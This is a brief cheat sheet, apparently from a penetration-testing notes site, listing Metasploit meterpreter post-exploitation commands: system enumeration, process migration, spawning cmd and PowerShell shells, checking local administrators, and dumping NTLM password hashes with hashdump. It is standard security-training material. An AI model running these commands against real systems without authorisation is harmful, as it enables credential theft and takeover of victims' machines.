Metasploit
Post Exploitation Workflow
getuid
sysinfo
ps -S explorer.exe #Get the process list with filter "explorer.exe"
migrate <pid> #Migrate the session to process
shell #Spawn a cmd.exe process
Check group members
net localgroup adminstrators
Load Powershell Extension
Spawn a powershell.exe in your meterpreter session, just like running shell command to spawn cmd.exe in your session
meterpreter> load powershell
meterpreter> powershell_shell
Dump windows users NTLM hashes
meterpreter> hashdump
Last updated
Was this helpful?